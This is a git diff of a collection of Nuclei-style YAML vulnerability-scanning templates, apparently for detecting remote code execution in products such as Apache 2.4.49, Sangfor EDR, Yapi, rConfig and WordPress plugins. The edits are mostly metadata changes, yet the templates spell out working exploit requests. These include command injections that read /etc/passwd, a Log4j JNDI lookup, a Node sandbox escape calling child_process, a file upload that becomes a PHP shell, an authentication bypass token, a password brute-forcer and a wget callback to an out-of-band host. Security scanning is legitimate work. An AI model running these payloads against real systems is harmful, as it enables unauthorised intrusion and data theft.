Hashicorp Consul Services Api RCE author: pikpikcu severity: critical - reference: - - https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oast,intrusive + reference: https://www.exploit-db.com/exploits/46074 + tags: hashicorp,rce,oob + requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 205 { "ID": "{{randstr}}", @@ -23,6 +28,7 @@ requests: "Timeout": "86400s" } } + matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction diff --git a/poc/remote_code_execution/hiboss-rce-7945.yaml b/poc/remote_code_execution/hiboss-rce-7945.yaml index 827e35bc3b..8e6c523e36 100644 --- a/poc/remote_code_execution/hiboss-rce-7945.yaml +++ b/poc/remote_code_execution/hiboss-rce-7945.yaml @@ -1,15 +1,11 @@ id: hiboss-rce info: - name: Hiboss - Remote Code Execution + name: Hiboss RCE author: pikpikcu severity: critical - description: HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. + description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. reference: - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: hiboss,rce requests: - raw: @@ -28,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/03 diff --git a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml index caa8758541..a7494e8328 100644 --- a/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml +++ b/poc/remote_code_execution/icewarp-webclient-rce-8129.yaml @@ -1,12 +1,11 @@ id: icewarp-webclient-rce - info: name: IceWarp WebClient RCE author: gy741 severity: critical + reference: + - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - requests: - raw: - | @@ -15,14 +14,12 @@ requests: Content-Type: application/x-www-form-urlencoded _dlg[captcha][target]=system(\'ver\')\ - matchers-condition: and matchers: - type: word words: - "Microsoft Windows [Version" part: body - - type: status status: - 302 diff --git a/poc/remote_code_execution/metersphere-plugin-rce.yaml b/poc/remote_code_execution/metersphere-plugin-rce.yaml index 78b6fd5836..6a7a2bac58 100644 --- a/poc/remote_code_execution/metersphere-plugin-rce.yaml +++ b/poc/remote_code_execution/metersphere-plugin-rce.yaml @@ -3,10 +3,10 @@ info: name: MeterSphere Plugin Pre-auth RCE author: pdteam,y4er severity: critical - tags: metersphere,rce,intrusive reference: - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/ - https://github.com/metersphere/metersphere + tags: metersphere,rce,intrusive requests: - raw: - | diff --git a/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml b/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml index d6fe1d8eb4..b66890728d 100644 --- a/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml +++ b/poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml @@ -1,4 +1,5 @@ id: mobileiron-log4j-jndi-rce + info: name: MobileIron Log4J JNDI RCE author: meme-lord @@ -10,6 +11,7 @@ info: - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a - https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron tags: rce,jndi,oast,log4j,mobileiron + requests: - raw: - | @@ -18,19 +20,22 @@ requests: Content-Type: application/x-www-form-urlencoded j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/poc/remote_code_execution/natshell-rce.yaml b/poc/remote_code_execution/natshell-rce.yaml index a9cb6aa19c..2b7a5614d1 100644 --- a/poc/remote_code_execution/natshell-rce.yaml +++ b/poc/remote_code_execution/natshell-rce.yaml @@ -1,26 +1,22 @@ id: natshell-rce - info: name: NatShell Debug File RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + reference: + - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,rce - requests: - method: POST path: - "{{BaseURL}}/debug.php" body: | cmd=cat /etc/passwd - matchers-condition: and matchers: - - type: regex regex: - "toor:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml index cc1d3a4837..2d962b0a96 100644 --- a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml +++ b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml @@ -1,11 +1,8 @@ id: pdf-signer-ssti-to-rce - info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - description: todo - requests: - method: GET path: diff --git a/poc/remote_code_execution/phalcon-framework-source.yaml b/poc/remote_code_execution/phalcon-framework-source.yaml index 0e2270201c..179a41795e 100644 --- a/poc/remote_code_execution/phalcon-framework-source.yaml +++ b/poc/remote_code_execution/phalcon-framework-source.yaml @@ -1,9 +1,8 @@ id: phalcon-framework-source info: - name: Phalcon Framework - Source Code Leakage + name: Phalcon Framework Source Code leakage author: philippedelteil severity: high - description: Phalcon Framework source code was discovered. tags: exposure,debug,phalcon requests: - method: GET @@ -20,5 +19,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml index 9ddbab9b4c..aae82c8c57 100644 --- a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -1,35 +1,33 @@ id: qi-anxin-netkang-next-generation-firewall-rce + info: - name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution + name: Qi'anxin Netkang Next Generation Firewall RCE author: pikpikcu severity: critical - description: | - Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: rce,firewall,intrusive + reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + tags: rce + requests: - raw: - | POST /directdata/direct/router HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 + Content-Length: 178 - {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} + {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} - | - GET /{{randstr}}.txt HTTP/1.1 + GET /poc.txt HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 + matchers-condition: and matchers: - type: regex - part: body regex: - - "root:.*:0:0:" + - "root:.*:0:0" + part: body + - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/rce-cve-2021-41773.yaml b/poc/remote_code_execution/rce-cve-2021-41773.yaml index 87e89bc5e2..f8fd2f8e57 100644 --- a/poc/remote_code_execution/rce-cve-2021-41773.yaml +++ b/poc/remote_code_execution/rce-cve-2021-41773.yaml @@ -1,51 +1,16 @@ id: CVE-2021-41773 - info: - name: Apache 2.4.49 - Path Traversal and Remote Code Execution - author: daffainfo - severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://twitter.com/h4x0r_dz/status/1445401960371429381 - - https://github.com/blasty/CVE-2021-41773 - remediation: Update to Apache HTTP Server 2.4.50 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - metadata: - shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa - + name: RCE in Apache HTTP Server 2.4.49 + author: RafaelCaria + severity: critical + tags: cve,cve2021,rce requests: - - raw: - - | - GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev - - matchers-condition: or + - method: POST + path: + - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + body: 'echo;id' matchers: - - type: regex - name: LFI + part: body regex: - - "root:.*:0:0:" - - - type: word - name: RCE - words: - - "CVE-2021-41773-POC" - -# Enhanced by mp on 2022/02/27 + - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/poc/remote_code_execution/rconfig-rce.yaml b/poc/remote_code_execution/rconfig-rce.yaml index 207517a711..3ebb60b6c5 100644 --- a/poc/remote_code_execution/rconfig-rce.yaml +++ b/poc/remote_code_execution/rconfig-rce.yaml @@ -1,22 +1,14 @@ id: rconfig-rce - info: - name: rConfig 3.9.5 - Arbitrary File Upload + name: rConfig 3.9.5 - Remote Code Execution author: dwisiswant0 severity: high - description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cwe-id: CWE-434 + tags: rconfig,rce + description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 - tags: rconfig,rce,edb - metadata: - max-request: 1 - -http: +requests: - raw: - | POST /lib/crud/userprocess.php HTTP/1.1 @@ -54,16 +46,12 @@ http: 9 --01b28e152ee044338224bf647275f8eb-- - matchers-condition: and matchers: - type: word words: - "User {{randstr}} successfully added to Database" - part: body - type: status status: - 302 - -# Enhanced by md on 2022/10/05 diff --git a/poc/remote_code_execution/salesforce-aura-9981.yaml b/poc/remote_code_execution/salesforce-aura-9981.yaml index 1fd9a804b6..b6c85071b2 100644 --- a/poc/remote_code_execution/salesforce-aura-9981.yaml +++ b/poc/remote_code_execution/salesforce-aura-9981.yaml @@ -4,7 +4,7 @@ info: author: aaron_costello (@ConspiracyProof) severity: info reference: https://www.enumerated.de/index/salesforce - tags: aura,unauth,salesforce,exposure + tags: aura,unauth,salesforce requests: - method: POST path: @@ -14,6 +14,6 @@ requests: body: "{}" matchers: - type: word - part: body words: - 'aura:invalidSession' + part: body diff --git a/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml b/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml index eeec0fe91a..fdd06e0395 100644 --- a/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml +++ b/poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml @@ -1,10 +1,15 @@ id: samsung-wlan-ap-rce info: - name: Samsung Wlan AP (WEA453e) RCE + name: Samsung WLAN AP WEA453e - Remote Code Execution author: pikpikcu severity: critical + description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in. reference: - - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: xss,samsung,rce requests: - method: POST @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/31 diff --git a/poc/remote_code_execution/sangfor-edr-rce-10030.yaml b/poc/remote_code_execution/sangfor-edr-rce-10030.yaml index c51500b87d..1952c84b15 100644 --- a/poc/remote_code_execution/sangfor-edr-rce-10030.yaml +++ b/poc/remote_code_execution/sangfor-edr-rce-10030.yaml @@ -1,5 +1,4 @@ id: sangfor-edr-rce - info: name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution author: pikpikcu @@ -12,11 +11,9 @@ info: cvss-score: 10.0 cwe-id: CWE-77 metadata: - max-request: 1 fofa-query: app="sangfor" tags: rce,sangfor - -http: +requests: - method: POST path: - "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9" @@ -24,14 +21,12 @@ http: Content-Type: application/x-www-form-urlencoded body: | {"params":"w=123\"'1234123'\"|cat /etc/passwd"} - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - - type: status status: - 200 diff --git a/poc/remote_code_execution/sar2html-rce-10082.yaml b/poc/remote_code_execution/sar2html-rce-10082.yaml index 24a127592a..c32fd046bb 100644 --- a/poc/remote_code_execution/sar2html-rce-10082.yaml +++ b/poc/remote_code_execution/sar2html-rce-10082.yaml @@ -1,5 +1,4 @@ id: sar2html-rce - info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 @@ -7,14 +6,12 @@ info: description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oast - requests: - raw: - | GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Accept: */* - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml index 574d070ebd..2cfcddd5ab 100644 --- a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml +++ b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml @@ -1,12 +1,11 @@ id: showdoc-file-upload-rce - info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - reference: https://github.com/star7th/showdoc/pull/1059 + reference: + - https://github.com/star7th/showdoc/pull/1059 tags: rce,fileupload,showdoc - requests: - raw: - | @@ -20,7 +19,6 @@ requests: ----------------------------835846770881083140190633-- - matchers-condition: and matchers: - type: word @@ -28,12 +26,10 @@ requests: - '"url":"http:' - '"success":1' condition: and - - type: status status: - 200 - extractors: - type: json json: - - '.url' \ No newline at end of file + - '.url' diff --git a/poc/remote_code_execution/springboot-log4j-rce.yaml b/poc/remote_code_execution/springboot-log4j-rce.yaml index 28f847f7e4..4286931f8d 100644 --- a/poc/remote_code_execution/springboot-log4j-rce.yaml +++ b/poc/remote_code_execution/springboot-log4j-rce.yaml @@ -1,10 +1,9 @@ id: springboot-log4j-rce info: - name: Spring Boot - Remote Code Execution (Apache Log4j) + name: Spring Boot Log4j Remote Code Injection author: pdteam severity: critical - description: Spring Boot is susceptible to remote code execution via Apache Log4j. reference: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ @@ -45,6 +44,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - -# Enhanced by mp on 2022/05/31 + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/poc/remote_code_execution/tamronos-rce.yaml b/poc/remote_code_execution/tamronos-rce.yaml index 9a9e405787..03c27beac8 100644 --- a/poc/remote_code_execution/tamronos-rce.yaml +++ b/poc/remote_code_execution/tamronos-rce.yaml @@ -1,19 +1,24 @@ id: tamronos-rce + info: name: TamronOS IPTV/VOD RCE author: pikpikcu severity: critical reference: https://twitter.com/sec715/status/1405336456923471874 tags: tamronos,rce + requests: - method: GET path: - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 diff --git a/poc/remote_code_execution/thinkcmf-rce-10727.yaml b/poc/remote_code_execution/thinkcmf-rce-10727.yaml index 715539039f..0173c895e9 100644 --- a/poc/remote_code_execution/thinkcmf-rce-10727.yaml +++ b/poc/remote_code_execution/thinkcmf-rce-10727.yaml @@ -6,18 +6,19 @@ info: reference: https://www.freebuf.com/vuls/217586.html tags: thinkcmf,rce requests: - - raw: - - | - GET /index.php?a=fetch&content={{url_encode('/Isc/third-party/httpd/htdocs/test.txt;" - "{{BaseURL}}/test.txt" - matchers-condition: and matchers: - type: status diff --git a/poc/remote_code_execution/webui-rce.yaml b/poc/remote_code_execution/webui-rce.yaml index 09b1d2e004..372b5a39ce 100644 --- a/poc/remote_code_execution/webui-rce.yaml +++ b/poc/remote_code_execution/webui-rce.yaml @@ -1,21 +1,32 @@ id: webui-rce + info: - name: WebUI 1.5b6 RCE + name: WebUI 1.5b6 - Remote Code Execution author: pikpikcu severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 + description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: webui,rce + requests: - method: GET path: - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and matchers: - type: word words: - "c5b3d7397a90f42d222f7ed9408c0dc6" part: body + - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml b/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml index b4c420c7dc..e4393fb210 100644 --- a/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml +++ b/poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml @@ -1,29 +1,46 @@ id: wp-woocommerce-email-verification + info: - name: wordpress-emails-verification-for-woocommerce - author: random-robbie + name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + author: random_robbie,daffianfo severity: critical - tags: wordpress,wp-plugin - - # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - # https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers + description: | + Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. + reference: + - https://wpvulndb.com/vulnerabilities/10318 + - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-288 + metadata: + max-request: 2 + tags: woocommerce,wp,wpscan,wordpress,wp-plugin -requests: +http: - method: GET path: + - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + + stop-at-first-match: true matchers-condition: and matchers: + - type: regex + part: header + regex: + - "wordpress_logged_in_[a-z0-9]{32}" + - type: word + part: body words: - - "wordpress_logged_in" - part: header + - "Your account has been activated!" + - "From your account dashboard you can view your" + condition: and - type: status status: - - 401 - - 403 - negative: true \ No newline at end of file + - 200 + +# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml b/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml index 804afc6b74..d50fb50d35 100644 --- a/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml +++ b/poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml @@ -1,4 +1,5 @@ id: wordpress-rce-simplefilelist + info: name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha @@ -6,15 +7,14 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive,upload,python + requests: - raw: - | POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -39,22 +39,21 @@ requests: --6985fa39c0698d07f6d418b37388e1b2-- + - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 - Accept: */* - Connection: close X-Requested-With: XMLHttpRequest - Content-Length: 81 + Accept: */* Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php + - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close + matchers-condition: and matchers: - type: word diff --git a/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml b/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml index cb27f780b4..26b60896bf 100644 --- a/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml +++ b/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml @@ -1,5 +1,4 @@ id: wordpress-xmlrpc-brute-force - info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid @@ -9,7 +8,6 @@ info: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz - requests: - raw: - | @@ -29,18 +27,15 @@ requests: - attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: diff --git a/poc/remote_code_execution/yapi-rce-11726.yaml b/poc/remote_code_execution/yapi-rce-11726.yaml index 0078f2b883..0afebedde5 100644 --- a/poc/remote_code_execution/yapi-rce-11726.yaml +++ b/poc/remote_code_execution/yapi-rce-11726.yaml @@ -1,17 +1,19 @@ id: yapi-rce - info: - name: Yapi Remote Code Execution + name: Yapi - Remote Code Execution author: pikpikcu severity: critical - description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: yapi,rce - requests: - raw: - | # REQUEST 1 @@ -19,42 +21,35 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* - - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true extractors: - type: regex @@ -64,7 +59,6 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' - - type: regex name: interface_id group: 1 @@ -72,7 +66,6 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' - - type: regex name: project_id group: 1 @@ -80,14 +73,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/ruby/grails-database-admin-console-7822.yaml b/poc/ruby/grails-database-admin-console-7822.yaml index d2aaaaddb9..f2ed34b32f 100644 --- a/poc/ruby/grails-database-admin-console-7822.yaml +++ b/poc/ruby/grails-database-admin-console-7822.yaml @@ -13,13 +13,7 @@ requests: - '{{BaseURL}}/dbconsole/' - '{{BaseURL}}/h2-console/' - matchers-condition: and matchers: - type: word words: - "H2 Console" - - - type: word - words: - - "Sorry, remote connections ('webAllowOthers') are disabled on this server" - negative: true diff --git a/poc/ruby/rails6-xss-9800.yaml b/poc/ruby/rails6-xss-9800.yaml index 184c779cfa..7991dd37b2 100644 --- a/poc/ruby/rails6-xss-9800.yaml +++ b/poc/ruby/rails6-xss-9800.yaml @@ -1,20 +1,22 @@ id: rails6-xss -# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); 